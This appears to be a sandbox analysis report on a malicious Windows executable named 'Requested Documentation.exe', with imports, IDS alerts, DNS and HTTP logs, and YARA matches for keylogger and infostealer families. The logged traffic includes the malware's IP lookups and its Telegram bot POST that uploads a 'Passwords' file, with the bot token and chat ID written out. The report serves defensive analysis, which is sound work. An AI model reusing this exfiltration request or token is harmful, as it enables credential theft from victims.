RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x38b68 | data | | | 1.0003486930468024
RT_GROUP_ICON | 0x108320 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x108398 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1083ac | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1083c0 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1083d4 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1084b0 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T10:57:04.598653+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 132.226.247.73 | 80 | TCP
2024-12-30T10:57:10.598757+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 132.226.247.73 | 80 | TCP
2024-12-30T10:57:11.223524+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | TCP
2024-12-30T10:57:11.526050+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 10:57:03.639806986 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 30, 2024 10:57:03.647578955 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 30, 2024 10:57:03.647655010 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 30, 2024 10:57:03.648849964 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 30, 2024 10:57:03.654083014 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 30, 2024 10:57:04.310375929 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 30, 2024 10:57:04.337264061 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 30, 2024 10:57:04.342091084 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 30, 2024 10:57:04.543490887 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 30, 2024 10:57:04.593416929 CET | 49731 | 443 | 192.168.2.4 | 188.114.96.3
Dec 30, 2024 10:57:04.593460083 CET | 443 | 49731 | 188.114.96.3 | 192.168.2.4
Dec 30, 2024 10:57:04.593532085 CET | 49731 | 443 | 192.168.2.4 | 188.114.96.3
Dec 30, 2024 10:57:04.598653078 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 30, 2024 10:57:04.603225946 CET | 49731 | 443 | 192.168.2.4 | 188.114.96.3
Dec 30, 2024 10:57:04.603240013 CET | 443 | 49731 | 188.114.96.3 | 192.168.2.4
Dec 30, 2024 10:57:05.045761108 CET | 443 | 49731 | 188.114.96.3 | 192.168.2.4
Dec 30, 2024 10:57:05.045876980 CET | 49731 | 443 | 192.168.2.4 | 188.114.96.3
Dec 30, 2024 10:57:05.051095009 CET | 49731 | 443 | 192.168.2.4 | 188.114.96.3
Dec 30, 2024 10:57:05.051109076 CET | 443 | 49731 | 188.114.96.3 | 192.168.2.4
Dec 30, 2024 10:57:05.051436901 CET | 443 | 49731 | 188.114.96.3 | 192.168.2.4
Dec 30, 2024 10:57:05.098678112 CET | 49731 | 443 | 192.168.2.4 | 188.114.96.3
Dec 30, 2024 10:57:05.136605024 CET | 49731 | 443 | 192.168.2.4 | 188.114.96.3
Dec 30, 2024 10:57:05.183340073 CET | 443 | 49731 | 188.114.96.3 | 192.168.2.4
Dec 30, 2024 10:57:05.242628098 CET | 443 | 49731 | 188.114.96.3 | 192.168.2.4
Dec 30, 2024 10:57:05.242685080 CET | 443 | 49731 | 188.114.96.3 | 192.168.2.4
Dec 30, 2024 10:57:05.242851019 CET | 49731 | 443 | 192.168.2.4 | 188.114.96.3
Dec 30, 2024 10:57:05.247924089 CET | 49731 | 443 | 192.168.2.4 | 188.114.96.3
Dec 30, 2024 10:57:10.344635963 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 30, 2024 10:57:10.350325108 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 30, 2024 10:57:10.551820993 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 30, 2024 10:57:10.562915087 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Dec 30, 2024 10:57:10.562956095 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Dec 30, 2024 10:57:10.563020945 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Dec 30, 2024 10:57:10.563466072 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Dec 30, 2024 10:57:10.563483000 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Dec 30, 2024 10:57:10.598757029 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 30, 2024 10:57:11.175781012 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Dec 30, 2024 10:57:11.175908089 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Dec 30, 2024 10:57:11.179384947 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Dec 30, 2024 10:57:11.179394007 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Dec 30, 2024 10:57:11.179650068 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Dec 30, 2024 10:57:11.180999994 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Dec 30, 2024 10:57:11.223340034 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Dec 30, 2024 10:57:11.223434925 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Dec 30, 2024 10:57:11.223463058 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Dec 30, 2024 10:57:11.526099920 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Dec 30, 2024 10:57:11.526196957 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Dec 30, 2024 10:57:11.526257038 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Dec 30, 2024 10:57:11.526738882 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Dec 30, 2024 10:58:15.552257061 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 30, 2024 10:58:15.552320004 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 30, 2024 10:58:45.260049105 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 30, 2024 10:58:45.264925003 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 10:57:03.627974033 CET | 51898 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 10:57:03.634711981 CET | 53 | 51898 | 1.1.1.1 | 192.168.2.4
Dec 30, 2024 10:57:04.585674047 CET | 55946 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 10:57:04.592833996 CET | 53 | 55946 | 1.1.1.1 | 192.168.2.4
Dec 30, 2024 10:57:10.555624008 CET | 54649 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 10:57:10.562305927 CET | 53 | 54649 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 10:57:03.627974033 CET | 192.168.2.4 | 1.1.1.1 | 0x78d7 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:57:04.585674047 CET | 192.168.2.4 | 1.1.1.1 | 0xf266 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:57:10.555624008 CET | 192.168.2.4 | 1.1.1.1 | 0x9957 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 10:57:03.634711981 CET | 1.1.1.1 | 192.168.2.4 | 0x78d7 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 10:57:03.634711981 CET | 1.1.1.1 | 192.168.2.4 | 0x78d7 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:57:03.634711981 CET | 1.1.1.1 | 192.168.2.4 | 0x78d7 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:57:03.634711981 CET | 1.1.1.1 | 192.168.2.4 | 0x78d7 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:57:03.634711981 CET | 1.1.1.1 | 192.168.2.4 | 0x78d7 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:57:03.634711981 CET | 1.1.1.1 | 192.168.2.4 | 0x78d7 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:57:04.592833996 CET | 1.1.1.1 | 192.168.2.4 | 0xf266 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:57:04.592833996 CET | 1.1.1.1 | 192.168.2.4 | 0xf266 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:57:10.562305927 CET | 1.1.1.1 | 192.168.2.4 | 0x9957 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 132.226.247.73 | 80 | 6344 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 10:57:03.648849964 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 30, 2024 10:57:04.310375929 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 09:57:04 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 30, 2024 10:57:04.337264061 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 30, 2024 10:57:04.543490887 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 09:57:04 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 30, 2024 10:57:10.344635963 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 30, 2024 10:57:10.551820993 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 09:57:10 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 188.114.96.3 | 443 | 6344 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:57:05 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-30 09:57:05 UTC | 852 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 09:57:05 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 867414
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eE4y1TfofWorFppVSIJPPgjhx0rtVkPUEIGYUltTnAx2QuvocIj0zhQOPZoRwleMHYL4sqNYBhvqX18Ao9%2F3fkfa35CexFkHwkYgVDE%2FgXGnYlL3F1s1MWjvucCqsy9u7oo8mzu4"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa129e36ca49e02-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1976&rtt_var=751&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1447694&cwnd=244&unsent_bytes=0&cid=0f57581887fc53ad&ts=209&x=0"
2024-12-30 09:57:05 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | 6344 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:57:11 UTC | 295 | OUT | POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd288e6a54ccbb
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2024-12-30 09:57:11 UTC | 1090 | OUT | Data Ascii: --===============8dd288e6a54ccbbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-30 09:57:11 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 30 Dec 2024 09:57:11 GMT
Content-Type: application/json
Content-Length: 556
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-30 09:57:11 UTC | 556 | IN | Data Ascii: {"ok":true,"result":{"message_id":51750,"from":{"id":7708662779,"is_bot":true,"first_name":"NOVA","username":"Skullsnovabot"},"chat":{"id":5839829477,"first_name":"Makwanda","last_name":"Skulls","username":"Big4m","type":"private"},"date":1735552631,"docu


Target ID: 0
Start time: 04:57:00
Start date: 30/12/2024
Path: C:\Users\user\Desktop\Requested Documentation.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Requested Documentation.exe"
Imagebase: 0x980000
File size: 1'090'048 bytes
MD5 hash: 7CCC5D635CBD8627F4F2AAC3E54248D0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1739970349.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 1
Start time: 04:57:01
Start date: 30/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Requested Documentation.exe"
Imagebase: 0xc10000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.4192706984.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
